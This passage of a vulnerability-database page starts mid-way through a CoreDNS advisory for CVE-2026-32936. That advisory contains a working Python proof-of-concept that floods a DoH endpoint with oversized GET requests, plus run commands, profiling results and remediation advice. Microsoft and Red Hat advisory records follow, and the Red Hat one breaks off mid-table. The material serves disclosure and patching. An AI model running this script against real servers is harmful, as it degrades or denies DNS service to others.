concurrent.futures\nimport http.client\nimport ssl\nimport time\n\ndef send_one(host, port, path, timeout):\n ctx = ssl._create_unverified_context()\n conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx)\n try:\n conn.request(\"GET\", path, headers={\n \"Accept\": \"application/dns-message\",\n \"Connection\": \"close\",\n })\n resp = conn.getresponse()\n resp.read()\n return resp.status\n except Exception as e:\n return f\"ERR:{type(e).__name__}\"\n finally:\n try:\n conn.close()\n except Exception:\n pass\n\ndef main():\n ap = argparse.ArgumentParser()\n ap.add_argument(\"--host\", default=\"127.0.0.1\")\n ap.add_argument(\"--port\", type=int, default=8443)\n ap.add_argument(\"--decoded-kib\", type=int, default=720)\n ap.add_argument(\"--workers\", type=int, default=64)\n ap.add_argument(\"--requests\", type=int, default=5000)\n ap.add_argument(\"--timeout\", type=float, default=5.0)\n args = ap.parse_args()\n\n raw = b\"A\" * (args.decoded_kib * 1024)\n b64 = base64.urlsafe_b64encode(raw).rstrip(b\"=\").decode()\n path = \"/dns-query?dns=\" + b64\n\n print(f\"[+] target = https://{args.host}:{args.port}\")\n print(f\"[+] decoded bytes = {len(raw):,}\")\n print(f\"[+] encoded chars = {len(b64):,}\")\n print(f\"[+] request-target length = {len(path):,}\")\n print(f\"[+] workers = {args.workers}, requests = {args.requests}\")\n print(\"[+] 400 responses are expected; the issue is expensive processing before rejection.\\n\")\n\n started = time.time()\n results = collections.Counter()\n\n with concurrent.futures.ThreadPoolExecutor(max_workers=args.workers) as ex:\n futs = [\n ex.submit(send_one, args.host, args.port, path, args.timeout)\n for _ in range(args.requests)\n ]\n for i, fut in enumerate(concurrent.futures.as_completed(futs), 1):\n results[fut.result()] += 1\n if i % 10 == 0 or i == args.requests:\n print(f\"[{i}/{args.requests}] {dict(results)}\")\n\n elapsed = time.time() - started\n print(\"\\n[+] done\")\n print(f\"[+] elapsed = {elapsed:.2f}s\")\n print(f\"[+] summary = {dict(results)}\")\n\nif __name__ == \"__main__\":\n main()\n```\n\nRun the PoC:\n\n```bash\npython3 poc_doh_get_oversize_https.py \\\n --host 127.0.0.1 \\\n --port 8443 \\\n --decoded-kib 720 \\\n --workers 64 \\\n --requests 5000\n```\n\n#### Profiling commands used during reproduction\n\nCPU profile:\n\n```bash\n(curl -s \"http://127.0.0.1:6060/debug/pprof/profile?seconds=20\" -o cpu_attack.pb.gz \u0026) ; \\\nsleep 1 ; \\\npython3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 ; \\\nwait\n\ngo tool pprof -top ./coredns cpu_attack.pb.gz\n```\n\nHeap / allocation profiles:\n\n```bash\ncurl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_before.pb.gz\ncurl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_before.pb.gz\n\npython3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000\n\ncurl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_after.pb.gz\ncurl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_after.pb.gz\n\ngo tool pprof -top -base heap_before.pb.gz ./coredns heap_after.pb.gz\ngo tool pprof -top -base allocs_before.pb.gz ./coredns allocs_after.pb.gz\n```\n\n### Reproduction results\n\nI confirmed the issue on:\n\n* CoreDNS 1.14.2\n* linux/amd64\n* go1.26.1\n\nPoC payload characteristics:\n\n* decoded payload size: `737,280 bytes`\n* base64url-encoded `dns` length: `983,040`\n* request-target length: `983,055`\n\nObserved request outcome:\n\n* `5000 / 5000` requests returned `400 Bad Request`\n* total runtime for the 5000-request run: `18.22s`\n\nThe important point is that the requests are rejected only after expensive processing has already happened.\n\n#### CPU profile highlights\n\nThe CPU profile captured during the attack showed significant time in:\n\n* `net/http.readRequest`\n* `net/url.ParseQuery` / `net/url.QueryUnescape` / `net/url.unescape`\n* `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet`\n* `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg`\n* `encoding/base64.(*Encoding).DecodeString`\n* Go GC worker paths\n\nRepresentative cumulative values from the captured profile included:\n\n* `github.com/coredns/coredns/core/dnsserver.(*ServerHTTPS).ServeHTTP` \u2192 `10.91s`\n* `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` \u2192 `10.88s`\n* `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` \u2192 `10.88s`\n* `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` \u2192 `3.50s`\n* `encoding/base64.(*Encoding).DecodeString` \u2192 `3.46s`\n* `net/http.readRequest` \u2192 `10.57s`\n* `net/url.(*URL).Query` / `ParseQuery` / `QueryUnescape` \u2192 `7.38s`\n* `runtime.gcBgMarkWorker` and related GC paths were also heavily active\n\nThis demonstrates that the issue is not limited to final DNS unpacking. The oversized GET request forces meaningful work in HTTP parsing, URL handling, base64 decoding, and garbage collection before rejection.\n\n#### Allocation profile highlights\n\nAllocation profiling showed very large transient allocation volume caused by the rejected requests:\n\n* total `alloc_space`: `26,756.48 MB`\n\nTop contributors included:\n\n* `net/textproto.(*Reader).readLineSlice` \u2192 `19,668.19 MB`\n* `net/textproto.(*Reader).ReadLine` \u2192 `3,738.84 MB`\n* `encoding/base64.(*Encoding).DecodeString` \u2192 `2,766.16 MB`\n\nWithin the CoreDNS DoH GET path specifically:\n\n* `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` \u2192 `2,775.67 MB`\n* `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` \u2192 `2,775.67 MB`\n* `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` \u2192 `2,773.67 MB`\n\nHeap delta (`inuse_space`) also showed live growth attributable to this path, including:\n\n* `encoding/base64.(*Encoding).DecodeString` \u2192 `7,629.75 kB`\n\n#### Memory observations\n\nRuntime memory monitoring showed a clear increase in peak resident usage during the attack:\n\n* baseline `VmHWM / VmRSS` before load was approximately `55,864 kB`\n* observed `VmHWM` during testing reached approximately `146,100 kB`\n\nSo even though requests returned `400`, the server still experienced substantial transient memory growth and allocator / GC pressure before rejection.\n\n### Impact\n\nA remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to the HTTPS endpoint and force significant pre-rejection work.\n\nImpact includes:\n\n* elevated CPU consumption\n* large transient allocations\n* increased garbage-collection pressure\n* higher peak resident memory usage\n* degraded throughput and responsiveness\n* denial of service risk on memory-constrained or heavily loaded deployments\n\nThis is especially relevant for internet-facing DoH deployments, where an attacker can repeatedly trigger the GET parsing path without authentication.\n\nThe fact that the final HTTP status is `400 Bad Request` does not mitigate the issue, because the expensive processing has already occurred before the rejection is generated.\n\n### Suggested remediation\n\nA robust fix should address both stages of the problem:\n\n1. Apply an early bound on the DoH GET request target / raw query length before expensive query parsing.\n2. Enforce an encoded-length and decoded-length limit for the `dns` parameter before calling `DecodeString()`.\n3. Preserve equivalent size constraints across GET and POST paths.\n\nA minimal hardening direction would be:\n\n* reject oversized GET requests before `req.URL.Query()` on the DoH path\n* reject `dns` values whose encoded length exceeds the maximum valid DNS message encoding\n* reject any decoded payload larger than the supported DNS message size before unpacking\n\n---\n\n**Credit request: When referencing, republishing, or issuing downstream advisories for this vulnerability, please preserve the original researcher credit as Ali Firas (thesmartshadow).**",
"id": "GHSA-63cw-r7xf-jmwr",
"modified": "2026-06-12T19:25:56Z",
"published": "2026-04-28T22:43:47Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-63cw-r7xf-jmwr"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32936"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/releases/tag/v1.14.3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "CoreDNS DoH GET oversized dns= query parameter causes pre-validation CPU and memory amplification"
}
MSRC_CVE-2026-32936
Vulnerability from csaf_microsoft - Published: 2026-05-02 00:00 - Updated: 2026-05-15 14:40Summary
CoreDNS DoH GET path missing size validation causes CPU and memory amplification
Notes
Additional Resources: To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle
Disclaimer: The information provided in the Microsoft Knowledge Base is provided \"as is\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
References
4 references
| URL | Category |
|---|---|
| https://msrc.microsoft.com/csaf/vex/2026/msrc_cve… | self |
| https://support.microsoft.com/lifecycle | external |
| https://www.first.org/cvss | external |
| https://msrc.microsoft.com/csaf/vex/2026/msrc_cve… | self |
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2026-32936 CoreDNS DoH GET path missing size validation causes CPU and memory amplification - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2026/msrc_cve-2026-32936.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "CoreDNS DoH GET path missing size validation causes CPU and memory amplification",
"tracking": {
"current_release_date": "2026-05-15T14:40:06.000Z",
"generator": {
"date": "2026-05-16T07:10:14.957Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2026-32936",
"initial_release_date": "2026-05-02T00:00:00.000Z",
"revision_history": [
{
"date": "2026-05-07T01:02:48.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
},
{
"date": "2026-05-15T14:40:06.000Z",
"legacy_version": "2",
"number": "2",
"summary": "Information published."
}
],
"status": "final",
"version": "2"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003cazl3 coredns 0:1.11.4-15.azl3",
"product": {
"name": "\u003cazl3 coredns 0:1.11.4-15.azl3",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "azl3 coredns 0:1.11.4-15.azl3",
"product": {
"name": "azl3 coredns 0:1.11.4-15.azl3",
"product_id": "21180"
}
}
],
"category": "product_name",
"name": "coredns"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 coredns 0:1.11.4-15.azl3 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 coredns 0:1.11.4-15.azl3 as a component of Azure Linux 3.0",
"product_id": "21180-17084"
},
"product_reference": "21180",
"relates_to_product_reference": "17084"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2026-32936",
"cwe": {
"id": "CWE-400",
"name": "Uncontrolled Resource Consumption"
},
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"21180-17084"
],
"known_affected": [
"17084-1"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2026-32936 CoreDNS DoH GET path missing size validation causes CPU and memory amplification - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2026/msrc_cve-2026-32936.json"
}
],
"remediations": [
{
"category": "vendor_fix",
"date": "2026-05-07T01:02:48.000Z",
"details": "0:1.11.4-16.azl3:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"title": "CoreDNS DoH GET path missing size validation causes CPU and memory amplification"
}
]
}
RHSA-2026:25127
Vulnerability from csaf_redhat - Published: 2026-06-10 20:51 - Updated: 2026-06-17 08:03Summary
Red Hat Security Advisory: Submariner v0.21 security fixes and container updates
Severity
Important
Notes
Topic: Submariner v0.21 General Availability release images, which provide enhancements, security fixes, and updated container images.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE links in the References section.
Red Hat Advanced Cluster Management for Kubernetes v2.14
Details: Submariner is a Kubernetes operator that enables cross-cluster connectivity for services and pods, implementing KEP-1645 (Multi-Cluster Services API). After deploying the Submariner operator, it can enable direct networking between pods and services across different Kubernetes clusters.
For more information about Submariner, see the Submariner open source community website at: https://submariner.io/.
Terms of Use: This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
A local privilege escalation vulnerability has been discovered in containerd. This vulnerability is the result of an overly broad default permission which allows local users on the host to potentially access the metadata store, the content store and the contents of Kubernetes local volumes. The contents of volumes might include setuid binaries, which could allow a local user on the host to elevate privileges on the host.
7.7 (High)
Affected products
Fixed
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:2f772da0e95d6690c14966eaf7bb097a0c567a7077b93eb61d8bbcc552be4d1b_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:60c2e8e50cec20d1c78df0629256403d667ea47989aa3c30c696e76ce5e264e4_arm64 | — |
Vendor Fix
fix
Workaround
|
Known not affected
29 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:5b036c08592fc679e4a158d58e2077929d07eb62825d94fd55afeedaa831d154_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:80e8f73158f4300a85f94c84a4e71fd6c0d4ce9553380c623f156b137497dc5c_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:831c2d010a7f93da6c7f803c464171e3b14c2fe15779e3d2b0829f8d0f4e2285_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/nettest-rhel9@sha256:f928393188edf404a004d4a692c8b633bd9c3ea4c8cabd5a9441c82d482c84a9_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-operator-bundle@sha256:5b64e063acaeec1bae4ef902f3b482b47d85c0964e944e53663cff73f530a701_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:30dfcfaaf77a270fbcec02e53c013af5570a65334ef666cd77c9bef0a54d3418_s390x | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:5a97cf1a1723932e74bb1fc4fc410df0d78dd3035203cd7684bc3d6485d6f2e5_amd64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:83a6d00f217f3e9000d6e6cba602d52b65922290dbb0dcdae8ee12b1c8b383c1_arm64 | — |
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-route-agent-rhel9@sha256:c52a0fb2364483a9c23763e76bfeae9923a9ae3d35e646012c528f7cc46bcdc1_ppc64le | — |
Workaround
|
Threats
Impact
Important
A flaw was found in the net/url package in the Go standard library. The package does not enforce a limit on the number of unique query parameters it parses. A Go application using the net/http.Request.ParseForm method will try to process all parameters provided in the request. A specially crafted HTTP request containing a massive number of query parameters will cause the application to consume an excessive amount of memory, eventually causing the application to crash or become unresponsive, resulting in a denial of service.
7.5 (High)
Affected products
Fixed
28 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:0cbb0970c438efa6f7da80f8628b76550d8986d7f73b4f00e5c929d766472d7b_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:6aaeb062ada48648fd880cc1094180a2fa2b0bb3e9bbd9b0bcbe9a833c7f7208_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:bbe086814cc2fe9e53699ff23705479b493a62f9521b5f2664fcdb97dd5705a9_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-agent-rhel9@sha256:eac6affcb33fec57b7c3018346aa26759326b49264973b5c9a01d1a7c18285fc_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:84ea010ee8369be60c67bb28c831897583c5d23055c902c5e68be70729d80b73_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e688af48ddf8d59c39e64b4c38e72fc2d6f06f28ab3732703d1c1664d91bdad7_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:e802f821ed0cc9f6f026a0385681e9e8b0daad39b6e7ea75e7c99f3df28e4e44_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/lighthouse-coredns-rhel9@sha256:eee8da5b239e8a1cb5dc52e6ab514eebe159977afe842a0f7035732701a6f87a_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5455803b15f596679c80af65bc7e4d600d68bffcdfba6701444ff5da039f5bb2_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:5e1d6eea31cf8b7a3e5d1c94af072c81f1be1da47122938a2eeec7acd6e778c7_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:a154b2b05fe49a472506ed9f211693057361b9a58b0fa6477afb7abbba9e9e54_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/subctl-rhel9@sha256:cac1a0a0a72004f64edb104385d2c0683a15401c8970777a2db2978b4fa32d33_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:157ec65b5967f65026b2e6c8d688fa734dbd8d2b056960b43d2ee9672979d120_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:2629fcf4d38774d9d4fa5bb72bb664982b32b8b8e1018a36d6bfd0b05a16a1c9_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:5118901bb1b8336f1a99f8757a32d61070fde1b4a26e40b7282aae81ae0b741d_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-gateway-rhel9@sha256:7314924a015ddfc1dde55dd4991b9b3df8e8a279c3ce354d9d86ae66adfa46da_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:2d6f324a2f853471f3697da356db792ea9203939c4a12c02040c4cf62bbb9fb1_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:a7f2ac46b1edce62e4a8707e940a3813016b6a7c7ee11225700c792bc449ee33_amd64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:be69bc672cabbced9e23829820685b30183bae1910a8af9fed5c1eff3a11aca3_arm64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-globalnet-rhel9@sha256:ed6fa4602b7d1f175e8df0601be5b2c3e8ea9d906dc9cd2fd8a5ab76eea97175_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:01a082229dbfbfee20345e1ccff5c8ac3ac3bd727a666d29221f465b43701133_s390x | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: Red Hat Advanced Cluster Management for Kubernetes 2.14:registry.redhat.io/rhacm2/submariner-rhel9-operator@sha256:100e10f6c2959526a2335d81d99c6887b16a29bd59e005e519140206d0ce73ed_ppc64le | — |
Vendor Fix
fix
Workaround
|
|
